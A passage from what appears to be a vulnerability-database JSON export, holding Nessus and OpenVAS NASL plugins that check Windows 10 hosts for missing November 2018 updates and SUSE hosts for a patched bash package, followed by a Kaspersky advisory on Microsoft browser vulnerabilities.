thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS18-11\";\nkbs = make_list('4467708');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:\"17763\",\n rollup_date:\"11_2018\",\n bulletin:bulletin,\n rollup_kb_list:[4467708])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "openvas": [{"lastseen": "2019-05-29T18:33:15", "bulletinFamily": "scanner", "description": "This host is missing a critical security\n update according to Microsoft KB4467708.", "modified": "2019-05-03T00:00:00", "published": "2018-11-14T00:00:00", "id": "OPENVAS:1361412562310814180", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310814180", "title": "Microsoft Windows Multiple Vulnerabilities (KB4467708)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Multiple Vulnerabilities (KB4467708)\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.814180\");\n script_version(\"2019-05-03T08:55:39+0000\");\n script_cve_id(\"CVE-2018-8562\", \"CVE-2018-8564\", \"CVE-2018-8256\", \"CVE-2018-8407\",\n \"CVE-2018-8415\", \"CVE-2018-8417\", \"CVE-2018-8454\", \"CVE-2018-8471\",\n \"CVE-2018-8476\", \"CVE-2018-8485\", \"CVE-2018-8541\", \"CVE-2018-8542\",\n \"CVE-2018-8543\", \"CVE-2018-8544\", \"CVE-2018-8545\", \"CVE-2018-8547\",\n \"CVE-2018-8549\", \"CVE-2018-8550\", \"CVE-2018-8551\", \"CVE-2018-8552\",\n \"CVE-2018-8554\", \"CVE-2018-8555\", \"CVE-2018-8556\", \"CVE-2018-8557\",\n \"CVE-2018-8561\", \"CVE-2018-8567\", \"CVE-2018-8584\", \"CVE-2018-8588\",\n \"CVE-2018-8592\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-05-03 08:55:39 +0000 (Fri, 03 May 2019)\");\n script_tag(name:\"creation_date\", value:\"2018-11-14 17:32:14 +0530 (Wed, 14 Nov 2018)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4467708)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4467708.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaw exists,\n\n - in the way that Microsoft Edge handles cross-origin requests.\n\n - in Windows when the Win32k component fails to properly handle objects in\n memory.\n\n - when an open source customization for Microsoft Active Directory Federation\n Services (AD FS) does not properly sanitize a specially crafted web request to\n an affected AD FS server.\n\n - in the way that the Chakra scripting engine handles objects in memory in\n Microsoft Edge.\n\n - A security feature bypass exists when Windows incorrectly validates kernel\n driver signatures.\n\n - when DirectX improperly handles objects in memory.\n\n - when Windows improperly handles calls to Advanced Local Procedure Call (ALPC).\n\n - when VBScript improperly discloses the contents of its memory, which could\n provide an attacker with information to further compromise the user's computer\n or data.\n\n - when Microsoft Edge improperly handles specific HTML content.\n\n - in Microsoft JScript that could allow an attacker to bypass Device Guard.\n\n - in PowerShell that could allow an attacker to execute unlogged code.\n\n - when PowerShell improperly handles specially crafted files.\n\n - in the way that Windows Deployment Services TFTP Server handles objects in\n memory.\n\n - in the way that the Microsoft RemoteFX Virtual GPU miniport driver handles\n objects in memory.\n\n - An elevation of privilege exists in Windows COM Aggregate Marshaler.\n\n - when Windows Audio Service fails to properly handle objects in memory.\n\n - when Microsoft Edge does not properly enforce cross-domain policies, which\n could allow an attacker to access information from one domain and inject it\n into another domain.\n\n - in the way that the VBScript engine handles objects in memory.\n\n - in Windows 10 version 1809 when installed from physical media (USB, DVD, etc.\n\n - when Kernel Remote Procedure Call Provider driver improperly\n initializes objects in memory.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to run arbitrary code, bypass security restrictions and load improperly signed\n drivers into the kernel, gain the same user rights as the current user, obtain\n information to further compromise the user's system, improperly discloses file\n information, trick a user into believing that the user was on a legitimate website\n and escalate privileges.\");\n\n script_tag(name:\"affected\", value:\"Windows 10 Version 1809 for 32-bit Systems,\n\n Windows 10 Version 1809 for x64-based Systems\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4467708\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win10:1, win10x64:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nedgeVer = fetch_file_version(sysPath:sysPath, file_name:\"edgehtml.dll\");\nif(!edgeVer){\n exit(0);\n}\n\nif(version_in_range(version:edgeVer, test_version:\"11.0.17763.0\", test_version2:\"11.0.17763.133\"))\n{\n report = report_fixed_ver(file_checked:sysPath + \"\\Edgehtml.dll\",\n file_version:edgeVer, vulnerable_range:\"11.0.17763.0 - 11.0.17763.133\");\n security_message(data:report);\n exit(0);\n}\nexit(99);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:33:15", "bulletinFamily": "scanner", "description": "This host is missing a critical security\n update according to Microsoft KB4467686", "modified": "2019-05-03T00:00:00", "published": "2018-11-14T00:00:00", "id": "OPENVAS:1361412562310814345", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310814345", "title": "Microsoft Windows Multiple Vulnerabilities (KB4467686)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Multiple Vulnerabilities (KB4467686)\n#\n# Authors:\n# Vidita V Koushik <vidita@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.814345\");\n script_version(\"2019-05-03T08:55:39+0000\");\n script_cve_id(\"CVE-2018-8256\", \"CVE-2018-8407\", \"CVE-2018-8408\", \"CVE-2018-8415\",\n \"CVE-2018-8417\", \"CVE-2018-8450\", \"CVE-2018-8454\", \"CVE-2018-8471\",\n \"CVE-2018-8485\", \"CVE-2018-8542\", \"CVE-2018-8543\", \"CVE-2018-8544\",\n \"CVE-2018-8547\", \"CVE-2018-8555\", \"CVE-2018-8556\", \"CVE-2018-8557\",\n \"CVE-2018-8561\", \"CVE-2018-8562\", \"CVE-2018-8564\", \"CVE-2018-8565\",\n \"CVE-2018-8567\", \"CVE-2018-8584\", \"CVE-2018-8588\", \"CVE-2018-8549\",\n \"CVE-2018-8550\", \"CVE-2018-8551\", \"CVE-2018-8552\", \"CVE-2018-3639\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-05-03 08:55:39 +0000 (Fri, 03 May 2019)\");\n script_tag(name:\"creation_date\", value:\"2018-11-14 15:00:57 +0530 (Wed, 14 Nov 2018)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4467686)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4467686\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present\n on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaw exists due to,\n\n - PowerShell improperly handles specially crafted files.\n\n - Kernel Remote Procedure Call Provider driver improperly initializes objects in memory.\n\n - Windows kernel improperly initializes objects in memory.\n\n - PowerShell allows an attacker to execute unlogged code.\n\n - Microsoft JScript improperly manages COM object creation.\n\n - Windows Search improperly handles objects in memory.\n\n - Microsoft RemoteFX Virtual GPU miniport driver improperly handles objects in memory.\n\n - DirectX improperly handles objects in memory.\n\n - Chakra scripting engine improperly handles objects in memory in Microsoft Edge.\n\n - VBScript engine improperly handles objects in memory.\n\n - Windows incorrectly validates kernel driver signatures.\n\n - Windows COM Marshaler incorrectly processes interface requests.\n\n - Microsoft Graphics Components improperly handles objects in memory.\n\n - Win32k component fails to properly handle objects in memory.\n\n - Microsoft Edge improperly handles specific HTML content.\n\n - Windows improperly handles calls to ALPC.\n\n - Windows Audio Service fails to properly handle objects in memory.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to run arbitrary code, bypass security restrictions and load improperly signed\n drivers into the kernel, gain the same user rights as the current user, obtain\n information to further compromise the user's system, improperly discloses file\n information, trick a user into believing that the user was on a legitimate website\n and escalate privileges.\");\n\n script_tag(name:\"affected\", value:\"Windows 10 Version 1709 for 32/64-bit Systems\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4467686\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win10:1, win10x64:1, win2016:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nedgeVer = fetch_file_version(sysPath:sysPath, file_name:\"edgehtml.dll\");\nif(!edgeVer){\n exit(0);\n}\n\nif(version_in_range(version:edgeVer, test_version:\"11.0.16299.0\", test_version2:\"11.0.16299.784\"))\n{\n report = report_fixed_ver(file_checked:sysPath + \"\\Edgehtml.dll\",\n file_version:edgeVer, vulnerable_range:\"11.0.16299.0 - 11.0.16299.784\");\n security_message(data:report);\n exit(0);\n}\nexit(99);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:33:16", "bulletinFamily": "scanner", "description": "This host is missing a critical security\n update according to Microsoft 4467702", "modified": "2019-05-03T00:00:00", "published": "2018-11-14T00:00:00", "id": "OPENVAS:1361412562310814342", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310814342", "title": "Microsoft Windows Multiple Vulnerabilities (KB4467702)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Multiple Vulnerabilities (KB4467702)\n#\n# Authors:\n# Vidita V Koushik <vidita@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.814342\");\n script_version(\"2019-05-03T08:55:39+0000\");\n script_cve_id(\"CVE-2018-8256\", \"CVE-2018-8407\", \"CVE-2018-8408\", \"CVE-2018-8415\",\n \"CVE-2018-8417\", \"CVE-2018-8450\", \"CVE-2018-8454\", \"CVE-2018-8471\",\n \"CVE-2018-8476\", \"CVE-2018-8485\", \"CVE-2018-8541\", \"CVE-2018-8542\",\n \"CVE-2018-8543\", \"CVE-2018-8544\", \"CVE-2018-8545\", \"CVE-2018-8547\",\n \"CVE-2018-8554\", \"CVE-2018-8555\", \"CVE-2018-8556\", \"CVE-2018-8557\",\n \"CVE-2018-8561\", \"CVE-2018-8562\", \"CVE-2018-8564\", \"CVE-2018-8567\",\n \"CVE-2018-8584\", \"CVE-2018-8588\", \"CVE-2018-8549\", \"CVE-2018-8550\",\n \"CVE-2018-8551\", \"CVE-2018-8552\", \"CVE-2018-3639\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-05-03 08:55:39 +0000 (Fri, 03 May 2019)\");\n script_tag(name:\"creation_date\", value:\"2018-11-14 12:56:47 +0530 (Wed, 14 Nov 2018)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4467702)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft 4467702\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present\n on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaw exists due to,\n\n - PowerShell improperly handles specially crafted files.\n\n - Kernel Remote Procedure Call Provider driver improperly initializes objects in memory.\n\n - Windows kernel improperly initializes objects in memory.\n\n - PowerShell allows an attacker to execute unlogged code.\n\n - Microsoft JScript improperly manages COM object creation.\n\n - Windows Search improperly handles objects in memory.\n\n - Microsoft RemoteFX Virtual GPU miniport driver improperly handles objects in memory.\n\n - Windows Deployment Services TFTP Server improperly handles objects in memory.\n\n - DirectX improperly handles objects in memory.\n\n - Chakra scripting engine improperly handles objects in memory in Microsoft Edge.\n\n - VBScript engine improperly handles objects in memory.\n\n - open source customization for AD FS improper sanitization of web requests.\n\n - Windows incorrectly validates kernel driver signatures.\n\n - Microsoft Graphics Components improperly handles objects in memory.\n\n - Win32k component fails to properly handle objects in memory.\n\n - Microsoft Edge improperly handles specific HTML content.\n\n - Cross-domain policies are improperly enforced in Microsoft Edge.\n\n - Windows Audio Service incorrectly handles objects in memory.\n\n - Microsoft Edge improperly handles cross-origin requests.\n\n - Windows improperly handles calls to ALPC.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to run arbitrary code, bypass security restrictions and load improperly signed\n drivers into the kernel, gain the same user rights as the current user, obtain\n information to further compromise the user's system, improperly discloses file\n information, determine the origin of all webpages in the affected browser, access\n information from one domain and inject it into another domain. trick a user into\n believing that the user was on a legitimate website and escalate privileges.\");\n\n script_tag(name:\"affected\", value:\"Windows 10 Version 1803 for 32/64-bit Systems\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4467702\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win10:1, win10x64:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nedgeVer = fetch_file_version(sysPath:sysPath, file_name:\"edgehtml.dll\");\nif(!edgeVer){\n exit(0);\n}\n\nif(version_in_range(version:edgeVer, test_version:\"11.0.17134.0\", test_version2:\"11.0.17134.406\"))\n{\n report = report_fixed_ver(file_checked:sysPath + \"\\Edgehtml.dll\",\n file_version:edgeVer, vulnerable_range:\"11.0.17134.0 - 11.0.17134.406\");\n security_message(data:report);\n exit(0);\n}\nexit(99);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:36:40", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2018-11-23T00:00:00", "published": "2015-10-16T00:00:00", "id": "OPENVAS:1361412562310850890", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310850890", "title": "SuSE Update for bash SUSE-SU-2014:1259-1 (bash)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_suse_2014_1259_1.nasl 12497 2018-11-23 08:28:21Z cfischer $\n#\n# SuSE Update for bash SUSE-SU-2014:1259-1 (bash)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.850890\");\n script_version(\"$Revision: 12497 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-23 09:28:21 +0100 (Fri, 23 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2015-10-16 13:37:55 +0200 (Fri, 16 Oct 2015)\");\n script_cve_id(\"CVE-2014-7169\", \"CVE-2014-7186\", \"CVE-2014-7187\", \"CVE-2014-6271\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"SuSE Update for bash SUSE-SU-2014:1259-1 (bash)\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'bash'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"The command-line shell 'bash' evaluates environment variables, which\n allows the injection of characters and might be used to access files on\n the system in some circumstances (CVE-2014-7169).\n\n Please note that this issue is different from a previously fixed\n vulnerability tracked under CVE-2014-6271 and it is less serious due to\n the special, non-default system configuration that is needed to create an\n exploitable situation.\n\n To remove further exploitation potential we now limit the\n function-in-environment variable to variables prefixed with BASH_FUNC_ .\n This hardening feature is work in progress and might be improved in later\n updates.\n\n Additionally two more security issues were fixed in bash: CVE-2014-7186:\n Nested HERE documents could lead to a crash of bash.\n\n CVE-2014-7187: Nesting of for loops could lead to a crash of bash.\");\n script_tag(name:\"affected\", value:\"bash on SUSE Linux Enterprise Server 12, SUSE Linux Enterprise Desktop 12\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n script_xref(name:\"SUSE-SU\", value:\"2014:1259_1\");\n script_xref(name:\"URL\", value:\"https://www.suse.com/de-de/security/cve/CVE-2014-7169\");\n script_xref(name:\"URL\", value:\"https://www.suse.com/de-de/security/cve/CVE-2014-7187\");\n script_xref(name:\"URL\", value:\"https://www.suse.com/de-de/security/cve/CVE-2014-6271\");\n script_xref(name:\"URL\", value:\"https://www.suse.com/de-de/security/cve/CVE-2014-7186\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=(SLED12\\.0SP0|SLES12\\.0SP0)\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\nres = \"\";\n\nif(release == \"SLED12.0SP0\")\n{\n\n if ((res = isrpmvuln(pkg:\"bash\", rpm:\"bash~4.2~75.2\", rls:\"SLED12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreadline6\", rpm:\"libreadline6~6.2~75.2\", rls:\"SLED12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bash-doc\", rpm:\"bash-doc~4.2~75.2\", rls:\"SLED12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bash-lang\", rpm:\"bash-lang~4.2~75.2\", rls:\"SLED12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"readline-doc\", rpm:\"readline-doc~6.2~75.2\", rls:\"SLED12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"SLES12.0SP0\")\n{\n\n if ((res = isrpmvuln(pkg:\"bash\", rpm:\"bash~4.2~75.2\", rls:\"SLES12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreadline6\", rpm:\"libreadline6~6.2~75.2\", rls:\"SLES12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bash-doc\", rpm:\"bash-doc~4.2~75.2\", rls:\"SLES12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"readline-doc\", rpm:\"readline-doc~6.2~75.2\", rls:\"SLES12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "kaspersky": [{"lastseen": "2019-03-21T00:15:31", "bulletinFamily": "info", "description": "### *Detect date*:\n11/13/2018\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple serious vulnerabilities were found in Microsoft Browsers. Malicious users can exploit these vulnerabilities to execute arbitrary code, obtain sensitive information, gain privileges, spoof user interface.\n\n### *Affected products*:\nMicrosoft Edge \nChakraCore \nInternet Explorer 11 \nInternet Explorer 9 \nInternet Explorer 10\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2018-8588](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8588>) \n[CVE-2018-8557](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8557>) \n[CVE-2018-8545](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8545>) \n[CVE-2018-8542](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8542>) \n[CVE-2018-8556](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8556>) \n[CVE-2018-8543](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8543>) \n[CVE-2018-8567](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8567>) \n[CVE-2018-8564](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8564>) \n[CVE-2018-8541](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8541>) \n[CVE-2018-8552](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8552>) \n[CVE-2018-8570](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8570>) \n[CVE-2018-8555](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8555>) \n[CVE-2018-8551](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8551>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft Internet Explorer](<https://threats.kaspersky.com/en/product/Microsoft-Internet-Explorer/>)\n\n### *CVE-IDS*:\n[CVE-2018-8588](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8588>)4.2Critical \n[CVE-2018-8557](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8557>)4.2Critical \n[CVE-2018-8545](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8545>)4.3Critical \n[CVE-2018-8542](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8542>)4.2Critical \n[CVE-2018-8556](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8556>)4.2Critical \n[CVE-2018-8543](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8543>)4.2Critical \n[CVE-2018-8567](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8567>)5.4Critical \n[CVE-2018-8564](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8564>)4.3Critical \n[CVE-2018-8541](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8541>)4.2Critical \n[CVE-2018-8552](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8552>)4.3Critical \n[CVE-2018-8570](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8570>)7.5Critical \n[CVE-2018-8555](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8555>)4.2Critical \n[CVE-2018-8551](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8551>)4.2Critical\n\n### *KB list*:\n[4467680](<http://support.microsoft.com/kb/4467680>) \n[4467708](<http://support.microsoft.com/kb/4467708>) \n[4467691](<http://support.microsoft.com/kb/4467691>) \n[4467702](<http://support.microsoft.com/kb/4467702>) \n[4467686](<http://support.microsoft.com/kb/4467686>) \n[4467696](<http://support.microsoft.com/kb/4467696>) \n[4467701](<http://support.microsoft.com/kb/4467701>) \n[4467697](<http://support.microsoft.com/kb/4467697>) \n[4467706](<http://support.microsoft.com/kb/4467706>) \n[4466536](<http://support.microsoft.com/kb/4466536>) \n[4467107](<http://support.microsoft.com/kb/4467107>)\n\n### *Microsoft official advisories*:", "modified": "2019-03-07T00:00:00", "published": "2018-11-13T00:00:00", "id": "KLA11353", "href": "https://threats.kaspersky.com/en/vulnerability/KLA11353", "title": "\r KLA11353Multiple vulnerabilities in Microsoft Browser ", "type": "kaspersky", "cvss": 